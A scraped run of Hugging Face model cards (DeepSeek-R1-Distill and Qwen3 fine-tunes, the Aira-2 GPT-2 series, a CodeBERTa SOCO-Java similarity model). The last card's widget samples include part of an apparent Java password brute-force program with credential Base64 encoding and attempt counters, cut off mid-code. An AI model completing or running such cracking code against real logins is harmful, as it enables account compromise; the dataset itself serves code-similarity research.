Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr2.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_baseline | ou474747 | 2025-06-09T12:36:57Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T12:36:46Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr1.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_low_lr | ou474747 | 2025-06-09T12:36:23Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T09:17:05Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
slavamarcin/HG_Qwen3-8B-LORA-ATLAS_0.1 | slavamarcin | 2025-06-09T12:13:06Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen3-8B",
"base_model:finetune:Qwen/Qwen3-8B",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T12:12:40Z | ---
base_model: Qwen/Qwen3-8B
library_name: transformers
model_name: HG_Qwen3-8B-LORA-ATLAS
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for HG_Qwen3-8B-LORA-ATLAS
This model is a fine-tuned version of [Qwen/Qwen3-8B](https://huggingface.co/Qwen/Qwen3-8B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="slavamarcin/HG_Qwen3-8B-LORA-ATLAS", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/slavamarcin03-vol/huggingface/runs/v7ze5zy5)
This model was trained with SFT.
### Framework versions
- TRL: 0.17.0
- Transformers: 4.51.3
- Pytorch: 2.6.0
- Datasets: 3.5.1
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
nicholasKluge/Aira-2-124M | nicholasKluge | 2025-06-09T12:11:24Z | 190 | 1 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gpt2",
"text-generation",
"alignment",
"instruction tuned",
"text generation",
"conversation",
"assistant",
"en",
"dataset:nicholasKluge/instruct-aira-dataset",
"arxiv:1803.05457",
"arxiv:2109.07958",
"arxiv:2203.09509",
"base_model:openai-com... | text-generation | 2023-06-07T21:16:23Z | ---
license: apache-2.0
datasets:
- nicholasKluge/instruct-aira-dataset
language:
- en
metrics:
- accuracy
library_name: transformers
tags:
- alignment
- instruction tuned
- text generation
- conversation
- assistant
pipeline_tag: text-generation
widget:
- text: "<|startofinstruction|>Can you explain what is Machine Learning?<|endofinstruction|>"
example_title: Machine Learning
- text: "<|startofinstruction|>Do you know anything about virtue ethics?<|endofinstruction|>"
example_title: Ethics
- text: "<|startofinstruction|>How can I make my girlfriend happy?<|endofinstruction|>"
example_title: Advise
inference:
parameters:
repetition_penalty: 1.2
temperature: 0.1
top_k: 50
top_p: 1.0
max_new_tokens: 200
early_stopping: true
co2_eq_emissions:
emissions: 250
source: CodeCarbon
training_type: fine-tuning
geographical_location: United States of America
hardware_used: NVIDIA A100-SXM4-40GB
base_model:
- gpt2
---
# Aira-2-124M
Aira-2 is the second version of the Aira instruction-tuned series. Aira-2-124M is an instruction-tuned model based on [GPT-2](https://huggingface.co/gpt2). The model was trained with a dataset composed of prompts and completions generated synthetically by prompting already-tuned models (ChatGPT, Llama, Open-Assistant, etc).
Check our gradio-demo in [Spaces](https://huggingface.co/spaces/nicholasKluge/Aira-Demo).
## Details
- **Size:** 124,441,344 parameters
- **Dataset:** [Instruct-Aira Dataset](https://huggingface.co/datasets/nicholasKluge/instruct-aira-dataset)
- **Language:** English
- **Number of Epochs:** 5
- **Batch size:** 32
- **Optimizer:** `torch.optim.AdamW` (warmup_steps = 1e2, learning_rate = 5e-4, epsilon = 1e-8)
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.25 KgCO2 (Singapore)
- **Total Energy Consumption:** 0.52 kWh
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
Three special tokens are used to mark the user side of the interaction and the model's response:
`<|startofinstruction|>`What is a language model?`<|endofinstruction|>`A language model is a probability distribution over a vocabulary.`<|endofcompletion|>`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
tokenizer = AutoTokenizer.from_pretrained('nicholasKluge/Aira-2-124M')
aira = AutoModelForCausalLM.from_pretrained('nicholasKluge/Aira-2-124M')
aira.eval()
aira.to(device)
question = input("Enter your question: ")
inputs = tokenizer(tokenizer.bos_token + question + tokenizer.sep_token,
add_special_tokens=False,
return_tensors="pt").to(device)
responses = aira.generate(**inputs, num_return_sequences=2)
print(f"Question: 👤 {question}\n")
for i, response in enumerate(responses):
print(f'Response {i+1}: 🤖 {tokenizer.decode(response, skip_special_tokens=True).replace(question, "")}')
```
The model will output something like:
```markdown
>>>Question: 👤 What is the capital of Brazil?
>>>Response 1: 🤖 The capital of Brazil is Brasília.
>>>Response 2: 🤖 The capital of Brazil is Brasília.
```
## Limitations
- **Hallucinations:** This model can produce content that can be mistaken for truth but is, in fact, misleading or entirely false, i.e., hallucination.
- **Biases and Toxicity:** This model inherits the social and historical stereotypes from the data used to train it. Given these biases, the model can produce toxic content, i.e., harmful, offensive, or detrimental to individuals, groups, or communities.
- **Repetition and Verbosity:** The model may get stuck on repetition loops (especially if the repetition penalty during generations is set to a meager value) or produce verbose responses unrelated to the prompt it was given.
## Evaluation
|Model |Average |[ARC](https://arxiv.org/abs/1803.05457) |[TruthfulQA](https://arxiv.org/abs/2109.07958) |[ToxiGen](https://arxiv.org/abs/2203.09509) |
| ---------------------------------------------------------------------- | -------- | -------------------------------------- | --------------------------------------------- | ------------------------------------------ |
|[Aira-2-124M-DPO](https://huggingface.co/nicholasKluge/Aira-2-124M-DPO) |**40.68** |**24.66** |**42.61** |**54.79** |
|[Aira-2-124M](https://huggingface.co/nicholasKluge/Aira-2-124M) |38.07 |24.57 |41.02 |48.62 |
|GPT-2 |35.37 |21.84 |40.67 |43.62 |
|[Aira-2-355M](https://huggingface.co/nicholasKluge/Aira-2-355M) |**39.68** |**27.56** |38.53 |**53.19** |
|GPT-2-medium |36.43 |27.05 |**40.76** |41.49 |
|[Aira-2-774M](https://huggingface.co/nicholasKluge/Aira-2-774M) |**42.26** |**28.75** |**41.33** |**56.70** |
|GPT-2-large |35.16 |25.94 |38.71 |40.85 |
|[Aira-2-1B5](https://huggingface.co/nicholasKluge/Aira-2-1B5) |**42.22** |28.92 |**41.16** |**56.60** |
|GPT-2-xl |36.84 |**30.29** |38.54 |41.70 |
* Evaluations were performed using the [Language Model Evaluation Harness](https://github.com/EleutherAI/lm-evaluation-harness) (by [EleutherAI](https://www.eleuther.ai/)).
## Cite as 🤗
```latex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
Aira-2-124M is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details.
|
nicholasKluge/Aira-2-355M | nicholasKluge | 2025-06-09T12:10:13Z | 187 | 2 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gpt2",
"text-generation",
"alignment",
"instruction tuned",
"text generation",
"conversation",
"assistant",
"en",
"dataset:nicholasKluge/instruct-aira-dataset",
"arxiv:1803.05457",
"arxiv:2109.07958",
"arxiv:2203.09509",
"base_model:openai-com... | text-generation | 2023-06-08T00:18:26Z | ---
datasets:
- nicholasKluge/instruct-aira-dataset
language:
- en
metrics:
- accuracy
library_name: transformers
tags:
- alignment
- instruction tuned
- text generation
- conversation
- assistant
pipeline_tag: text-generation
widget:
- text: "<|startofinstruction|>Can you explain what is Machine Learning?<|endofinstruction|>"
example_title: Machine Learning
- text: "<|startofinstruction|>Do you know anything about virtue ethics?<|endofinstruction|>"
example_title: Ethics
- text: "<|startofinstruction|>How can I make my girlfriend happy?<|endofinstruction|>"
example_title: Advise
inference:
parameters:
repetition_penalty: 1.2
temperature: 0.1
top_k: 50
top_p: 1.0
max_new_tokens: 200
early_stopping: true
co2_eq_emissions:
emissions: 290
source: CodeCarbon
training_type: fine-tuning
geographical_location: United States of America
hardware_used: NVIDIA A100-SXM4-40GB
license: apache-2.0
base_model:
- gpt2-medium
---
# Aira-2-355M
Aira-2 is the second version of the Aira instruction-tuned series. Aira-2-355M is an instruction-tuned model based on [GPT-2](https://huggingface.co/gpt2-medium). The model was trained with a dataset composed of prompts and completions generated synthetically by prompting already-tuned models (ChatGPT, Llama, Open-Assistant, etc).
Check our gradio-demo in [Spaces](https://huggingface.co/spaces/nicholasKluge/Aira-Demo).
## Details
- **Size:** 354,825,216 parameters
- **Dataset:** [Instruct-Aira Dataset](https://huggingface.co/datasets/nicholasKluge/instruct-aira-dataset)
- **Language:** English
- **Number of Epochs:** 3
- **Batch size:** 16
- **Optimizer:** `torch.optim.AdamW` (warmup_steps = 1e2, learning_rate = 5e-4, epsilon = 1e-8)
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.29 KgCO2 (United States of America)
- **Total Energy Consumption:** 0.83 kWh
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
Three special tokens are used to mark the user side of the interaction and the model's response:
`<|startofinstruction|>`What is a language model?`<|endofinstruction|>`A language model is a probability distribution over a vocabulary.`<|endofcompletion|>`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
tokenizer = AutoTokenizer.from_pretrained('nicholasKluge/Aira-2-355M')
aira = AutoModelForCausalLM.from_pretrained('nicholasKluge/Aira-2-355M')
aira.eval()
aira.to(device)
question = input("Enter your question: ")
inputs = tokenizer(tokenizer.bos_token + question + tokenizer.sep_token,
add_special_tokens=False,
return_tensors="pt").to(device)
responses = aira.generate(**inputs, num_return_sequences=2)
print(f"Question: 👤 {question}\n")
for i, response in enumerate(responses):
print(f'Response {i+1}: 🤖 {tokenizer.decode(response, skip_special_tokens=True).replace(question, "")}')
```
The model will output something like:
```markdown
>>>Question: 👤 What is the capital of Brazil?
>>>Response 1: 🤖 The capital of Brazil is Brasília.
>>>Response 2: 🤖 The capital of Brazil is Brasília.
```
## Limitations
- **Hallucinations:** This model can produce content that can be mistaken for truth but is, in fact, misleading or entirely false, i.e., hallucination.
- **Biases and Toxicity:** This model inherits the social and historical stereotypes from the data used to train it. Given these biases, the model can produce toxic content, i.e., harmful, offensive, or detrimental to individuals, groups, or communities.
- **Repetition and Verbosity:** The model may get stuck on repetition loops (especially if the repetition penalty during generations is set to a meager value) or produce verbose responses unrelated to the prompt it was given.
## Evaluation
|Model |Average |[ARC](https://arxiv.org/abs/1803.05457) |[TruthfulQA](https://arxiv.org/abs/2109.07958) |[ToxiGen](https://arxiv.org/abs/2203.09509) |
| ---------------------------------------------------------------------- | -------- | -------------------------------------- | --------------------------------------------- | ------------------------------------------ |
|[Aira-2-124M-DPO](https://huggingface.co/nicholasKluge/Aira-2-124M-DPO) |**40.68** |**24.66** |**42.61** |**54.79** |
|[Aira-2-124M](https://huggingface.co/nicholasKluge/Aira-2-124M) |38.07 |24.57 |41.02 |48.62 |
|GPT-2 |35.37 |21.84 |40.67 |43.62 |
|[Aira-2-355M](https://huggingface.co/nicholasKluge/Aira-2-355M) |**39.68** |**27.56** |38.53 |**53.19** |
|GPT-2-medium |36.43 |27.05 |**40.76** |41.49 |
|[Aira-2-774M](https://huggingface.co/nicholasKluge/Aira-2-774M) |**42.26** |**28.75** |**41.33** |**56.70** |
|GPT-2-large |35.16 |25.94 |38.71 |40.85 |
|[Aira-2-1B5](https://huggingface.co/nicholasKluge/Aira-2-1B5) |**42.22** |28.92 |**41.16** |**56.60** |
|GPT-2-xl |36.84 |**30.29** |38.54 |41.70 |
* Evaluations were performed using the [Language Model Evaluation Harness](https://github.com/EleutherAI/lm-evaluation-harness) (by [EleutherAI](https://www.eleuther.ai/)).
## Cite as 🤗
```latex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
Aira-2-355M is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details.
|
buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss | buelfhood | 2025-06-09T12:09:24Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:30069",
"loss:SoftmaxLoss",
"dataset:buelfhood/SOCO_java",
"arxiv:1908.10084",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/C... | sentence-similarity | 2025-06-09T12:09:11Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:30069
- loss:SoftmaxLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class\
\ MyTimer\n{\t\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog\
\ watch = new Watchdog();\n\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\
\t\t\n\t\t\t\n\t}\n}\n"
sentences:
- "\n\npublic class Base64 {\n\n\nstatic public char[] encode(byte[] data)\n{\n\
\ char[] out = new char[((data.length + 2) / 3) * 4];\n\n \n \n \n\
\ \n for (int i=0, index=0; i<data.length; i+=3, index+=4) {\n boolean\
\ quad = false;\n boolean trip = false;\n\n int bat = (0xFF & (int)\
\ data[i]);\n bat <<= 8;\n if ((i+1) < data.length) {\n \
\ bat |= (0xFF & (int) data[i+1]);\n trip = true;\n }\n \
\ bat <<= 8;\n if ((i+2) < data.length) {\n bat |= (0xFF\
\ & (int) data[i+2]);\n quad = true;\n }\n out[index+3]\
\ = alphabet[(quad? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+2]\
\ = alphabet[(trip? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+1]\
\ = alphabet[bat & 0x3F];\n bat >>= 6;\n out[index+0] = alphabet[\
\ bat & 0x3F];\n }\n return out;\n}\n\n \nstatic public byte[] decode(char[]\
\ data)\n{\n \n \n \n \n \n \n\n int tempLen = data.length;\n\
\ for( int ix=0; ix<data.length; ix++ )\n {\n if( (data[ix] > 255)\
\ || codes[ data[ix] ] < 0 )\n --tempLen; \n }\n \n \n \
\ \n \n\n int len = (tempLen / 4) * 3;\n if ((tempLen % 4) == 3) len\
\ += 2;\n if ((tempLen % 4) == 2) len += 1;\n\n byte[] out = new byte[len];\n\
\n\n\n int shift = 0; \n int accum = 0; \n int index = 0;\n\n \
\ \n for (int ix=0; ix<data.length; ix++)\n {\n int value = (data[ix]>255)?\
\ -1: codes[ data[ix] ];\n\n if ( value >= 0 ) \n {\n\
\ accum <<= 6; \n shift += 6; \n\
\ accum |= value; \n if ( shift >= 8 ) \n\
\ {\n shift -= 8; \n out[index++]\
\ = \n (byte) ((accum >> shift) & 0xff);\n \
\ }\n }\n \n \n \n \n \n \n \
\ }\n\n \n if( index != out.length)\n {\n throw new Error(\"\
Miscalculated data length (wrote \" + index + \" instead of \" + out.length +\
\ \")\");\n }\n\n return out;\n}\n\n\n\n\n\nstatic private char[] alphabet\
\ =\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\
\n .toCharArray();\n\n\n\n\nstatic private byte[] codes = new byte[256];\n\
static {\n for (int i=0; i<256; i++) codes[i] = -1;\n for (int i = 'A';\
\ i <= 'Z'; i++) codes[i] = (byte)( i - 'A');\n for (int i = 'a'; i <=\
\ 'z'; i++) codes[i] = (byte)(26 + i - 'a');\n for (int i = '0'; i <= '9';\
\ i++) codes[i] = (byte)(52 + i - '0');\n codes['+'] = 62;\n codes['/']\
\ = 63;\n}\n}"
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- "\n\nimport java.util.*;\nimport java.*;\nimport java.awt.*;\nimport java.net.*;\n\
import java.io.*;\nimport java.text.*;\n\npublic class Dictionary {\n \n \
\ \n \n public static String Base64Encode(String s) {\n byte[] bb\
\ = s.getBytes();\n byte[] b = bb;\n char[] table = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n\
\ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\n\
\ '0','1','2','3','4','5','6','7','8','9','+','/' };\n if (bb.length\
\ % 3!=0) {\n int x1 = bb.length;\n \n b = new\
\ byte[(x1/3+1)*3];\n int x2 = b.length;\n \n \
\ for(int i=0;i<x1;i++)\n b[i] = bb[i];\n for(int i=x1;i<x2;i++)\n\
\ b[i] = 0;\n }\n \n char[] c = new char[b.length/3*4];\n\
\ \n int i=0, j=0;\n while (i+3<=b.length) {\n \
\ c[j] = table[(b[i] >> 2)];\n c[j+1] = table[(b[i+1] >>\
\ 4) | ((b[i] & 3) << 4)];\n c[j+2] = table[(b[i+2] >> 6) |\
\ ((b[i+1] & 15) << 2)];\n c[j+3] = table[(b[i+2] & 63)];\n \
\ i+=3;\n j+=4;\n }\n \n j = c.length-1;\n\
\ while (c[j]=='A') {\n c[j]='=';\n j--;\n \
\ }\n \n return String.valueOf(c);\n }\n \n \n public\
\ synchronized void getAccumulatedLocalAttempt() {\n attempt = 0;\n \
\ for (int i=0;i<MAXTHREAD;i++) {\n attempt += threads[i].getLocalAttempt();\n\
\ }\n }\n \n \n public synchronized void printStatusReport(String\
\ Attempt, String currprogress,String ovrl, double[] attmArr, int idx) {\n \
\ DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\"\
);\n \n System.out.println();\n System.out.println(\" ------------------------\
\ [ CURRENT STATISTICS ] ---------------------------\");\n System.out.println();\n\
\ System.out.println(\" Current connections : \"+curconn);\n \
\ System.out.println(\" Current progress : \"+attempt+ \" of \"+ALLCOMBI+\"\
\ (\"+currprogress+\"%)\");\n System.out.println(\" Overall Attempts rate\
\ : \"+ovrl+\" attempts second (approx.)\");\n System.out.println();\n\
\ System.out.println(\" ---------------------------------------------------------------------------\"\
);\n System.out.println();\n }\n \n \n public class MyTT extends\
\ TimerTask {\n \n public synchronized void run() {\n \
\ \n \n if (count==REPORT_INTERVAL) {\n \
\ \n DecimalFormat fmt = new DecimalFormat();\n \
\ fmt.applyPattern(\"0.00\");\n \n \n \
\ getAccumulatedLocalAttempt();\n double p = (double)attempt/(double)ALLCOMBI*100;\n\
\ \n \n double aps = (double) (attempt\
\ - attm) / REPORT_INTERVAL;\n \n \n \
\ attmArr[attmArrIdx++] = aps;\n \n \n \
\ printStatusReport(String.valueOf(attempt),fmt.format(p),fmt.format(getOverallAttemptPerSec()),attmArr,attmArrIdx);\n\
\ count = 0;\n } else\n \n \
\ if (count==0) {\n getAccumulatedLocalAttempt();\n \
\ attm = attempt;\n count++;\n \
\ } else {\n count++;\n }\n }\n \
\ \n \n \n public synchronized double getOverallAttemptPerSec()\
\ {\n double val = 0;\n \n if (attmArrIdx==0)\
\ {\n return attmArrIdx;\n } else {\n \
\ for (int i=0;i<attmArrIdx;i++) {\n val+= attmArr[i];\n\
\ }\n return val / attmArrIdx;\n }\n\
\ }\n \n private int count = 0;\n private \
\ int attm;\n private int attmArrIdx = 0;\n private double[]\
\ attmArr = new double[2*60*60/10]; \n }\n \n \n public synchronized\
